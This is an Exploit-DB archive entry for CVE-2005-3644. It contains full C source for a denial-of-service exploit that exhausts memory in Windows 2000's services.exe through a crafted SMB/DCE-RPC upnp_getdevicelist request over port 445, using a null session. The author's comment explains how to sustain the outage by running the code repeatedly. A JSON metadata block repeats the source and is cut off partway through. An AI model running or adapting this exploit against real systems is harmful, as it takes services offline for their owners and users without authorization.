Microsoft Windows 2000 - UPNP getdevicelist Memory Leak DoS Exploit
2005-11-16T00:00:00
ID EDB-ID:1328 Type exploitdb Reporter Winny Thomas Modified 2005-11-16T00:00:00
Description
MS Windows 2k UPNP (getdevicelist) Memory Leak DoS Exploit. CVE-2005-3644. Dos exploit for windows platform
/*
* Author: Winny Thomas
* Nevis Labs, Pune, INDIA
*
* Details:
* While working on the exploit for MS05-047 i came across a condition where
* a specially crafted request to upnp_getdevicelist would cause
* services.exe to consume memory to a point where the target machines virtual
* memory gets exhausted. This exploit is NOT similar to the MS05-047 exploit i
* published earlier. The earlier one trashed the EIP of the target causing a
* crash in services.exe and eventually brought down the system to shut down.
* However in this exploit (again a DOS) the virtual memory is consumed to a
* point where desktop requests (like clicking "My Computer"), HTTP requests,
* SMB requests etc does not get serviced for sometime. After sometime the
* memory usage comes down and the target system would work as normal. However
* this code when continuosly executed against a target leads to a sustained
* DOS attack.
* Start the task manager on the target system and run this code against the
* target and watch the virtual memory usage shoot up.
*
* I used windbg to break on calls to upnp_getdevicelist when running this code.
* However even before the break point is hit the system becomes unresponsive.
* Strangely though changing the operation number in the DCERPC request to
* something else other than 0xa (upnp_getdevicelist) will make the DOS attempt
* fail. Perhaps changing the payload a little bit, so that the underlying
* demarshalling routines dont return an error, might reproduce this effect
* for other UPNP operations as well.
*
* TESTED ON: Windows 2000 server SP0, SP2 and SP3. I have not tested this on
* any of the above machines with the recent hot fixes for UPNP.
*
* Note: This code is for educational/testing purposes by authorized persons on networks systems setup for such purposes
* The author shall bear no responsibility for any damage caused by using this code.
*/
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
unsigned short ProcessID = 0;
unsigned short TID = 0;
unsigned short UserID = 0;
unsigned short FID = 0;
char peer0_0[] =
"\x00\x00\x00\x85\xFF\x53\x4D\x42\x72\x00\x00\x00\x00\x18\x53\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x00\x00\x00\x00\x62\x00\x02\x50\x43\x20\x4E\x45\x54\x57\x4F"
"\x52\x4B\x20\x50\x52\x4F\x47\x52\x41\x4D\x20\x31\x2E\x30\x00\x02"
"\x4C\x41\x4E\x4D\x41\x4E\x31\x2E\x30\x00\x02\x57\x69\x6E\x64\x6F"
"\x77\x73\x20\x66\x6F\x72\x20\x57\x6F\x72\x6B\x67\x72\x6F\x75\x70"
"\x73\x20\x33\x2E\x31\x61\x00\x02\x4C\x4D\x31\x2E\x32\x58\x30\x30"
"\x32\x00\x02\x4C\x41\x4E\x4D\x41\x4E\x32\x2E\x31\x00\x02\x4E\x54"
"\x20\x4C\x4D\x20\x30\x2E\x31\x32\x00" ;
char peer0_1[] =
"\x00\x00\x00\xA4\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x00\x10\x00\x0C\xFF\x00\xA4\x00\x04\x11\x0A\x00\x00\x00\x00"
"\x00\x00\x00\x20\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x69\x00\x4E"
"\x54\x4C\x4D\x53\x53\x50\x00\x01\x00\x00\x00\x97\x82\x08\xE0\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00"
"\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00"
"\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00"
"\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x35\x00"
"\x2E\x00\x30\x00\x00\x00\x00\x00";
char peer0_1_2[] =
"\x00\x00\x00\xDA\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x08\x20\x00\x0C\xFF\x00\xDA\x00\x04\x11\x0A\x00\x00\x00\x00"
"\x00\x00\x00\x57\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x9F\x00\x4E"
"\x54\x4C\x4D\x53\x53\x50\x00\x03\x00\x00\x00\x01\x00\x01\x00\x46"
"\x00\x00\x00\x00\x00\x00\x00\x47\x00\x00\x00\x00\x00\x00\x00\x40"
"\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x06\x00\x06\x00\x40"
"\x00\x00\x00\x10\x00\x10\x00\x47\x00\x00\x00\x15\x8A\x88\xE0\x48"
"\x00\x4F\x00\x44\x00\x00\xED\x41\x2C\x27\x86\x26\xD2\x59\xA0\xB3"
"\x5E\xAA\x00\x88\x6F\xC5\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00"
"\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00"
"\x32\x00\x31\x00\x39\x00\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00"
"\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00"
"\x30\x00\x20\x00\x35\x00\x2E\x00\x30\x00\x00\x00\x00\x00";
char peer0_2[] =
"\x00\x00\x00\x58\xFF\x53\x4D\x42\x75\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x08\x30\x00\x04\xFF\x00\x5A\x00\x08\x00\x01\x00\x2D\x00\x00";
char peer0_3[] =
"\x00\x00\x00\x66\xff\x53\x4d\x42\xa2\x00\x00\x00\x00\x18\x07\xc8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xff\xfe"
"\x00\x08\x40\x00\x18\xff\x00\xde\xde\x00\x10\x00\x16\x00\x00\x00"
"\x00\x00\x00\x00\x9f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00"
"\x02\x00\x00\x00\x03\x13\x00\x00\x5c\x00\x62\x00\x72\x00\x6f\x00"
"\x77\x00\x73\x00\x65\x00\x72\x00\x00\x00";
char peer0_4[] =
"\x00\x00\x00\x9A\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x08\x01\xC0"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xFF\xFE"
"\x00\x08\x01\x00\x10\x00\x00\x48\x00\x00\x00\x48\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x52\x00\x48\x00\x52\x00\x02"
"\x00\x26\x00\x00\x40\x57\x00\x00\x5C\x00\x50\x00\x49\x00\x50\x00"
"\x45\x00\x5C\x00\x00\x00\x05\x00\x0B\x03\x10\x00\x00\x00\x48\x00"
"\x00\x00\x00\x00\x00\x00\xD0\x16\xD0\x16\x00\x00\x00\x00\x01\x00"
"\x00\x00\x00\x00\x01\x00\x40\x4E\x9F\x8D\x3D\xA0\xCE\x11\x8F\x69"
"\x08\x00\x3E\x30\x05\x1B\x01\x00\x00\x00\x04\x5D\x88\x8A\xEB\x1C"
"\xC9\x11\x9F\xE8\x08\x00\x2B\x10\x48\x60\x02\x00\x00\x00";
char peer0_5[] =
//NETBIOS Fields
//==============
"\x00" //Message type
"\x00\x00\x80" //Payload length C
//SMB Fields
//==========
//SMB Header
"\xFF\x53\x4D\x42\x2F\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x40\x6D\x4E\xF4\x8C\x6E\x13\x7B\x00\x00\x00\x08\xFF\xFE"
"\x00\x08\x00\x01"
//Write ANDX Request fields
"\x0E" //Word count
"\xFF\x00\xDE\xDE\x00\x40\x00\x00\x00\x00\xFF"
"\xFF\xFF\xFF\x08\x00"
"\x40\x00" //Remaining C
"\x00\x00" //Data Length High
"\x40\x00" //Data Length Low C
"\x40\x00" //Data Offset C
"\x00\x00\x00\x00" //High Offset
"\x41\x00" //Byte count C
"\xEE"//Padding
//DCE RPC Request field
//=====================
"\x05\x00\x00\x03\x10\x00\x00\x00"
"\x40\x00" //Frag Length
"\x00\x00" //Auth Length
"\x8D\x00\x00\x00" //Call Id
"\x28\x00\x00\x00" //Alloc HINT C
"\x00\x00" //Context Id
"\x0A\x00" //OpNum; 10 in our case for PNP_GetDeviceList
//DATA for GetDeviceList
"\x00\x00\x00\x00"
"\x10\x10\x10\x10" //This is what kills the target. \x00\x00\x00\x00 is safe
"\x48\x54\x52\x45\x45\x5C\x52\x4F\x4F\x54\x5C"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00";
void send_packet(int sock, char *payload, int size,
char *type)
{
int ntrans, ret;
memcpy(&payload[30], &ProcessID, 2);
if (UserID)
memcpy(&payload[32], &UserID, 2);
if (TID)
memcpy(&payload[28], &TID, 2);
if (strcmp(type, "Sending DCE RPC Bind UPNPMGR request") == 0) {
memcpy(&payload[67], &FID, 2);
}
if (strcmp(type, "UPNPMGR upnp_getdevicelist request") == 0) {
memcpy(&payload[41], &FID, 2);
}
printf("[*] %s: ", type);
fflush(stdout);
ntrans = send(sock, payload, size, 0);
if (ntrans < 0) {
printf("\033[0;31mFailed\033[0;39m\n\n");
exit(-1);
}
}
void get_response(int sock, char *type)
{
int ret;
char response[1496];
ret = recv(sock, response, 1496, 0);
if (strcmp(type, "Null Session request 1") != 0) {
if ((ret < 0 || response[9] != 0)) {
printf("\033[0;31mError in %s response\033[0;39m\n\n", type);
exit(-1);
}
}
if (strcmp(type, "Null Session request 1") == 0) {
UserID = *(unsigned short *)&response[32];
}
if (strcmp(type, "Tree Connect") == 0) {
TID = *(unsigned short *)&response[28];
}
if (strcmp(type, "NT Creat AndX") == 0) {
FID = *(unsigned short *)&response[42];
}
if (strcmp(type, "UPNPMGR upnp_getdevicelist") == 0)
{
if((unsigned long)response[88] != 0) {
printf("\033[0;31mnca_s_fault_ndr\033[0;39m\n\n");
exit(-1);
}
}
printf("\033[0;32mOK\033[0;39m\n");
}
void banner()
{
printf("\n\n\033[0;31m\t!------------------------------------------!\n\033[0;39m");
printf("\033[0;31m\t Memory leak when sending upnp_getdevicelist request\n\033[0;39m");
printf("\033[0;31m\t Coded by: \033[0;34m Winny Thomas :-)\n\033[0;39m");
printf("\033[0;34m\t\t NevisLabs\n\033[0;39m");
printf("\033[0;34m\t\t Nevis Networks, Pune, INDIA\n\033[0;39m");
printf("\033[0;31m\t!------------------------------------------!\n\n\033[0;39m");
}
char *setup_tCon(char *UNC, char *ptr)
{
int pindex = 0, uindex = 0, len;
len = strlen(UNC);
while (uindex < len) {
if ((pindex % 2) != 0) {
ptr[pindex] = '\x00';
pindex++;
continue;
}
ptr[pindex] = UNC[uindex];
uindex++;
pindex++;
}
ptr[pindex] = '\x00';
pindex++;
ptr[pindex] = '\x00';
pindex++;
ptr[pindex] = '\x00';
pindex++;
ptr[pindex] = 'I'; pindex++; ptr[pindex] = 'P'; pindex++; ptr[pindex] ='C'; pindex++;
ptr[pindex] = '\x00';
pindex++;
ptr[pindex] = '\x00';
pindex++;
}
int main(int argc, char *argv[])
{
struct sockaddr_in target;
struct hostent *host;
char UNC[50], tConXpacket[150], *temp, targetIP[20];
int sockfd;
int ret, templen;
system("clear");
banner();
if (argc < 2) {
printf("Usage: %s <host name|ip address>\n\n", argv[0]);
exit(-1);
}
srand(time(NULL));
ProcessID = rand();
printf("[*] Resolving %s: ", argv[1]);
host = gethostbyname(argv[1]);
if (!host) {
printf("\033[0;31mFailed\033[0;39m\n");
exit(-1);
}
printf("\033[0;32mOK\033[0;39m\n");
target.sin_family = AF_INET;
target.sin_addr = *(struct in_addr *)host->h_addr;
target.sin_port = htons(445);
sprintf(targetIP, "%s", inet_ntoa(target.sin_addr));
sockfd = socket(AF_INET, SOCK_STREAM, 0);
ret = connect(sockfd, (struct sockaddr *)&target, sizeof(target));
if (ret < 0) {
perror("Connect");
exit(-1);
}
send_packet(sockfd, peer0_0, sizeof(peer0_0) -1, "Sending SMB Negotiate request");
get_response(sockfd, "SMB Negotiate");
send_packet(sockfd, peer0_1, sizeof(peer0_1) -1, "Sending Null Session request");
get_response(sockfd, "Null Session request 1");
send_packet(sockfd, peer0_1_2, sizeof(peer0_1_2) -1, "Sending Null Session request");
get_response(sockfd, "Null Session request 2");
bzero(tConXpacket, 150);
temp = tConXpacket;
memcpy(tConXpacket, peer0_2, sizeof(peer0_2));
temp += sizeof(peer0_2) -1;
sprintf(UNC, "\\\\%s\\IPC$", targetIP);
setup_tCon(UNC, temp);
templen = (strlen(UNC)*2) +9;
tConXpacket[3] = 43 + templen;
templen -= 2;
memcpy((unsigned long *)&tConXpacket[45], &templen, 1);
send_packet(sockfd, tConXpacket, sizeof(peer0_2) +templen, "Sending Tree Connect request");
get_response(sockfd, "Tree Connect");
send_packet(sockfd, peer0_3, sizeof(peer0_3) -1, "Sending NT Creat AndX request");
get_response(sockfd, "NT Creat AndX");
send_packet(sockfd, peer0_4, sizeof(peer0_4) -1, "Sending DCE RPC Bind UPNPMGR request");
get_response(sockfd, "DCE RPC Bind UPNPMGR");
send_packet(sockfd, peer0_5, sizeof(peer0_5) -1, "UPNPMGR upnp_getdevicelist request");
get_response(sockfd, "UPNPMGR upnp_getdevicelist");
close(sockfd);
}
// milw0rm.com [2005-11-16]
{"published": "2005-11-16T00:00:00", "id": "EDB-ID:1328", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "history": [], "enchantments": {"vulnersScore": 7.5}, "hash": "34c7d917600ca38cd49c191661e7e809313b5624702b59ced4fb84ad27fc7f11", "description": "MS Windows 2k UPNP (getdevicelist) Memory Leak DoS Exploit. CVE-2005-3644. Dos exploit for windows platform", "type": "exploitdb", "href": "https://www.exploit-db.com/exploits/1328/", "lastseen": "2016-01-31T14:00:47", "edition": 1, "title": "Microsoft Windows 2000 - UPNP getdevicelist Memory Leak DoS Exploit", "osvdbidlist": ["20916"], "modified": "2005-11-16T00:00:00", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-3644"], "sourceHref": "https://www.exploit-db.com/download/1328/", "references": [], "reporter": "Winny Thomas", "sourceData": "/* \n * Author: Winny Thomas\n * \t Nevis Labs, Pune, INDIA \t\n *\n * Details: \n * While working on the exploit for MS05-047 i came across a condition where\n * a specially crafted request to upnp_getdevicelist would cause \n * services.exe to consume memory to a point where the target machines virtual\n * memory gets exhausted. This exploit is NOT similar to the MS05-047 exploit i \n * published earlier. The earlier one trashed the EIP of the target causing a \n * crash in services.exe and eventually brought down the system to shut down. \n * However in this exploit (again a DOS) the virtual memory is consumed to a \n * point where desktop requests (like clicking \"My Computer\"), HTTP requests,\n * SMB requests etc does not get serviced for sometime. After sometime the \n * memory usage comes down and the target system would work as normal. However\n * this code when continuosly executed against a target leads to a sustained \n * DOS attack.\n * Start the task manager on the target system and run this code against the \n * target and watch the virtual memory usage shoot up.\n *\n * I used windbg to break on calls to upnp_getdevicelist when running this code.\n * However even before the break point is hit the system becomes unresponsive. \n * Strangely though changing the operation number in the DCERPC request to \n * something else other than 0xa (upnp_getdevicelist) will make the DOS attempt\n * fail. Perhaps changing the payload a little bit, so that the underlying \n * demarshalling routines dont return an error, might reproduce this effect\n * for other UPNP operations as well.\n *\n * TESTED ON: Windows 2000 server SP0, SP2 and SP3. I have not tested this on\n * any of the above machines with the recent hot fixes for UPNP.\n * \n * Note: This code is for educational/testing purposes by authorized persons on networks systems setup for such purposes \n * The author shall bear no responsibility for any damage caused by using this code. \n */\n\n#include <stdio.h>\n#include <sys/socket.h>\n#include <netinet/in.h>\n#include <arpa/inet.h>\n#include <netdb.h>\n\nunsigned short ProcessID = 0;\nunsigned short TID = 0;\nunsigned short UserID = 0;\nunsigned short FID = 0;\n\nchar peer0_0[] = \n\"\\x00\\x00\\x00\\x85\\xFF\\x53\\x4D\\x42\\x72\\x00\\x00\\x00\\x00\\x18\\x53\\xC8\"\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xFF\\xFE\"\n\"\\x00\\x00\\x00\\x00\\x00\\x62\\x00\\x02\\x50\\x43\\x20\\x4E\\x45\\x54\\x57\\x4F\"\n\"\\x52\\x4B\\x20\\x50\\x52\\x4F\\x47\\x52\\x41\\x4D\\x20\\x31\\x2E\\x30\\x00\\x02\"\n\"\\x4C\\x41\\x4E\\x4D\\x41\\x4E\\x31\\x2E\\x30\\x00\\x02\\x57\\x69\\x6E\\x64\\x6F\"\n\"\\x77\\x73\\x20\\x66\\x6F\\x72\\x20\\x57\\x6F\\x72\\x6B\\x67\\x72\\x6F\\x75\\x70\"\n\"\\x73\\x20\\x33\\x2E\\x31\\x61\\x00\\x02\\x4C\\x4D\\x31\\x2E\\x32\\x58\\x30\\x30\"\n\"\\x32\\x00\\x02\\x4C\\x41\\x4E\\x4D\\x41\\x4E\\x32\\x2E\\x31\\x00\\x02\\x4E\\x54\"\n\"\\x20\\x4C\\x4D\\x20\\x30\\x2E\\x31\\x32\\x00\" ;\n\nchar peer0_1[] = \n\"\\x00\\x00\\x00\\xA4\\xFF\\x53\\x4D\\x42\\x73\\x00\\x00\\x00\\x00\\x18\\x07\\xC8\"\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xFF\\xFE\"\n\"\\x00\\x00\\x10\\x00\\x0C\\xFF\\x00\\xA4\\x00\\x04\\x11\\x0A\\x00\\x00\\x00\\x00\"\n\"\\x00\\x00\\x00\\x20\\x00\\x00\\x00\\x00\\x00\\xD4\\x00\\x00\\x80\\x69\\x00\\x4E\"\n\"\\x54\\x4C\\x4D\\x53\\x53\\x50\\x00\\x01\\x00\\x00\\x00\\x97\\x82\\x08\\xE0\\x00\"\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\"\\x57\\x00\\x69\\x00\\x6E\\x00\\x64\\x00\\x6F\\x00\\x77\\x00\\x73\\x00\\x20\\x00\"\n\"\\x32\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x20\\x00\\x32\\x00\\x31\\x00\\x39\\x00\"\n\"\\x35\\x00\\x00\\x00\\x57\\x00\\x69\\x00\\x6E\\x00\\x64\\x00\\x6F\\x00\\x77\\x00\"\n\"\\x73\\x00\\x20\\x00\\x32\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x20\\x00\\x35\\x00\"\n\"\\x2E\\x00\\x30\\x00\\x00\\x00\\x00\\x00\";\n\nchar peer0_1_2[] = \n\"\\x00\\x00\\x00\\xDA\\xFF\\x53\\x4D\\x42\\x73\\x00\\x00\\x00\\x00\\x18\\x07\\xC8\"\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xFF\\xFE\"\n\"\\x00\\x08\\x20\\x00\\x0C\\xFF\\x00\\xDA\\x00\\x04\\x11\\x0A\\x00\\x00\\x00\\x00\"\n\"\\x00\\x00\\x00\\x57\\x00\\x00\\x00\\x00\\x00\\xD4\\x00\\x00\\x80\\x9F\\x00\\x4E\"\n\"\\x54\\x4C\\x4D\\x53\\x53\\x50\\x00\\x03\\x00\\x00\\x00\\x01\\x00\\x01\\x00\\x46\"\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x47\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x40\"\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x40\\x00\\x00\\x00\\x06\\x00\\x06\\x00\\x40\"\n\"\\x00\\x00\\x00\\x10\\x00\\x10\\x00\\x47\\x00\\x00\\x00\\x15\\x8A\\x88\\xE0\\x48\"\n\"\\x00\\x4F\\x00\\x44\\x00\\x00\\xED\\x41\\x2C\\x27\\x86\\x26\\xD2\\x59\\xA0\\xB3\"\n\"\\x5E\\xAA\\x00\\x88\\x6F\\xC5\\x57\\x00\\x69\\x00\\x6E\\x00\\x64\\x00\\x6F\\x00\"\n\"\\x77\\x00\\x73\\x00\\x20\\x00\\x32\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x20\\x00\"\n\"\\x32\\x00\\x31\\x00\\x39\\x00\\x35\\x00\\x00\\x00\\x57\\x00\\x69\\x00\\x6E\\x00\"\n\"\\x64\\x00\\x6F\\x00\\x77\\x00\\x73\\x00\\x20\\x00\\x32\\x00\\x30\\x00\\x30\\x00\"\n\"\\x30\\x00\\x20\\x00\\x35\\x00\\x2E\\x00\\x30\\x00\\x00\\x00\\x00\\x00\";\n\nchar peer0_2[] = \n\"\\x00\\x00\\x00\\x58\\xFF\\x53\\x4D\\x42\\x75\\x00\\x00\\x00\\x00\\x18\\x07\\xC8\"\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xFF\\xFE\"\n\"\\x00\\x08\\x30\\x00\\x04\\xFF\\x00\\x5A\\x00\\x08\\x00\\x01\\x00\\x2D\\x00\\x00\";\n\nchar peer0_3[] = \n\"\\x00\\x00\\x00\\x66\\xff\\x53\\x4d\\x42\\xa2\\x00\\x00\\x00\\x00\\x18\\x07\\xc8\"\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\xff\\xfe\"\n\"\\x00\\x08\\x40\\x00\\x18\\xff\\x00\\xde\\xde\\x00\\x10\\x00\\x16\\x00\\x00\\x00\"\n\"\\x00\\x00\\x00\\x00\\x9f\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x40\\x00\\x00\\x00\"\n\"\\x02\\x00\\x00\\x00\\x03\\x13\\x00\\x00\\x5c\\x00\\x62\\x00\\x72\\x00\\x6f\\x00\"\n\"\\x77\\x00\\x73\\x00\\x65\\x00\\x72\\x00\\x00\\x00\";\n\nchar peer0_4[] = \n\"\\x00\\x00\\x00\\x9A\\xFF\\x53\\x4D\\x42\\x25\\x00\\x00\\x00\\x00\\x08\\x01\\xC0\"\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\xFF\\xFE\"\n\"\\x00\\x08\\x01\\x00\\x10\\x00\\x00\\x48\\x00\\x00\\x00\\x48\\x00\\x00\\x00\\x00\"\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x52\\x00\\x48\\x00\\x52\\x00\\x02\"\n\"\\x00\\x26\\x00\\x00\\x40\\x57\\x00\\x00\\x5C\\x00\\x50\\x00\\x49\\x00\\x50\\x00\"\n\"\\x45\\x00\\x5C\\x00\\x00\\x00\\x05\\x00\\x0B\\x03\\x10\\x00\\x00\\x00\\x48\\x00\"\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\xD0\\x16\\xD0\\x16\\x00\\x00\\x00\\x00\\x01\\x00\"\n\"\\x00\\x00\\x00\\x00\\x01\\x00\\x40\\x4E\\x9F\\x8D\\x3D\\xA0\\xCE\\x11\\x8F\\x69\"\n\"\\x08\\x00\\x3E\\x30\\x05\\x1B\\x01\\x00\\x00\\x00\\x04\\x5D\\x88\\x8A\\xEB\\x1C\"\n\"\\xC9\\x11\\x9F\\xE8\\x08\\x00\\x2B\\x10\\x48\\x60\\x02\\x00\\x00\\x00\";\n\nchar peer0_5[] =\n//NETBIOS Fields\n//==============\n\"\\x00\"\t\t//Message type\n\"\\x00\\x00\\x80\" //Payload length \t\t\tC\n//SMB Fields\n//==========\n//SMB Header\n\"\\xFF\\x53\\x4D\\x42\\x2F\\x00\\x00\\x00\\x00\\x18\\x07\\xC8\"\n\"\\x00\\x00\\x40\\x6D\\x4E\\xF4\\x8C\\x6E\\x13\\x7B\\x00\\x00\\x00\\x08\\xFF\\xFE\"\n\"\\x00\\x08\\x00\\x01\"\n//Write ANDX Request fields\n\"\\x0E\" //Word count\n\"\\xFF\\x00\\xDE\\xDE\\x00\\x40\\x00\\x00\\x00\\x00\\xFF\"\n\"\\xFF\\xFF\\xFF\\x08\\x00\"\n\"\\x40\\x00\" //Remaining\t\t\t\t\tC\n\"\\x00\\x00\" //Data Length High\n\"\\x40\\x00\" //Data Length Low\t\t\t\tC\n\"\\x40\\x00\" //Data Offset\t\t\t\tC\t\n\"\\x00\\x00\\x00\\x00\" //High Offset\n\"\\x41\\x00\" //Byte count\t\t\t\t\tC\n\"\\xEE\"//Padding\n//DCE RPC Request field\n//=====================\n\"\\x05\\x00\\x00\\x03\\x10\\x00\\x00\\x00\"\n\"\\x40\\x00\" //Frag Length\n\"\\x00\\x00\" //Auth Length\n\"\\x8D\\x00\\x00\\x00\" //Call Id\n\"\\x28\\x00\\x00\\x00\" //Alloc HINT\t\t\t\tC\n\"\\x00\\x00\" //Context Id\n\"\\x0A\\x00\" //OpNum; 10 in our case for PNP_GetDeviceList\n//DATA for GetDeviceList \n\"\\x00\\x00\\x00\\x00\"\n\"\\x10\\x10\\x10\\x10\" //This is what kills the target. \\x00\\x00\\x00\\x00 is safe\n\"\\x48\\x54\\x52\\x45\\x45\\x5C\\x52\\x4F\\x4F\\x54\\x5C\"\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\"\\x00\\x00\\x00\\x00\\x00\\x00\";\n\nvoid send_packet(int sock, char *payload, int size,\nchar *type)\n{\n\tint ntrans, ret;\n\t\n\tmemcpy(&payload[30], &ProcessID, 2);\n\t\n\tif (UserID) \n\t\tmemcpy(&payload[32], &UserID, 2);\n\tif (TID)\n\t\tmemcpy(&payload[28], &TID, 2);\n\n\tif (strcmp(type, \"Sending DCE RPC Bind UPNPMGR request\") == 0) {\n\t\tmemcpy(&payload[67], &FID, 2);\n\t}\n\tif (strcmp(type, \"UPNPMGR upnp_getdevicelist request\") == 0) {\n\t\tmemcpy(&payload[41], &FID, 2);\n\t}\n\n\tprintf(\"[*] %s: \", type);\n\tfflush(stdout);\n\tntrans = send(sock, payload, size, 0);\n\tif (ntrans < 0) {\n\t\tprintf(\"\\033[0;31mFailed\\033[0;39m\\n\\n\");\n\t\texit(-1);\n\t}\n}\n\nvoid get_response(int sock, char *type)\n{\n\tint ret;\n\tchar response[1496];\n\n\tret = recv(sock, response, 1496, 0);\n\tif (strcmp(type, \"Null Session request 1\") != 0) {\n\t\tif ((ret < 0 || response[9] != 0)) {\n\t\t\tprintf(\"\\033[0;31mError in %s response\\033[0;39m\\n\\n\", type);\n\t\t\texit(-1);\n\t\t}\n\t}\n\t\n\tif (strcmp(type, \"Null Session request 1\") == 0) {\n\t\tUserID = *(unsigned short *)&response[32];\n\t}\n\tif (strcmp(type, \"Tree Connect\") == 0) {\n\t\tTID = *(unsigned short *)&response[28];\n\t}\n\tif (strcmp(type, \"NT Creat AndX\") == 0) {\n\t\tFID = *(unsigned short *)&response[42];\n\t}\n\t\n\tif (strcmp(type, \"UPNPMGR upnp_getdevicelist\") == 0)\n{\n\t\tif((unsigned long)response[88] != 0) {\n\t\t\tprintf(\"\\033[0;31mnca_s_fault_ndr\\033[0;39m\\n\\n\");\n\t\t\texit(-1);\n\t\t}\n\t}\n\tprintf(\"\\033[0;32mOK\\033[0;39m\\n\");\n}\n\nvoid banner()\n{\n\nprintf(\"\\n\\n\\033[0;31m\\t!------------------------------------------!\\n\\033[0;39m\");\n\tprintf(\"\\033[0;31m\\t Memory leak when sending upnp_getdevicelist request\\n\\033[0;39m\");\n\tprintf(\"\\033[0;31m\\t Coded by: \\033[0;34m Winny Thomas :-)\\n\\033[0;39m\");\n\tprintf(\"\\033[0;34m\\t\\t NevisLabs\\n\\033[0;39m\");\n\tprintf(\"\\033[0;34m\\t\\t Nevis Networks, Pune, INDIA\\n\\033[0;39m\");\n\nprintf(\"\\033[0;31m\\t!------------------------------------------!\\n\\n\\033[0;39m\");\n}\n\nchar *setup_tCon(char *UNC, char *ptr)\n{\n\tint pindex = 0, uindex = 0, len;\t\n\t\n\tlen = strlen(UNC);\n\twhile (uindex < len) {\n\t\tif ((pindex % 2) != 0) {\n\t\t\tptr[pindex] = '\\x00';\n\t\t\tpindex++;\n\t\t\tcontinue;\n\t\t}\n\n\t\tptr[pindex] = UNC[uindex];\n\t\tuindex++;\n\t\tpindex++;\n\t}\n\n\tptr[pindex] = '\\x00';\n\tpindex++;\n\tptr[pindex] = '\\x00';\n\tpindex++;\n\tptr[pindex] = '\\x00';\n\tpindex++;\n\n\tptr[pindex] = 'I'; pindex++; ptr[pindex] = 'P'; pindex++; ptr[pindex] ='C'; pindex++;\n\n\tptr[pindex] = '\\x00';\n\tpindex++;\n\tptr[pindex] = '\\x00';\n\tpindex++;\n}\n\nint main(int argc, char *argv[])\n{\n\tstruct sockaddr_in target;\n\tstruct hostent *host;\n\tchar UNC[50], tConXpacket[150], *temp, targetIP[20];\n\tint sockfd;\n\tint ret, templen;\n\t\n\tsystem(\"clear\");\n\tbanner();\n\n\tif (argc < 2) {\n\t\tprintf(\"Usage: %s <host name|ip address>\\n\\n\", argv[0]);\n\t\texit(-1);\n\t}\n\t\n\tsrand(time(NULL));\n\tProcessID = rand();\n\n\tprintf(\"[*] Resolving %s: \", 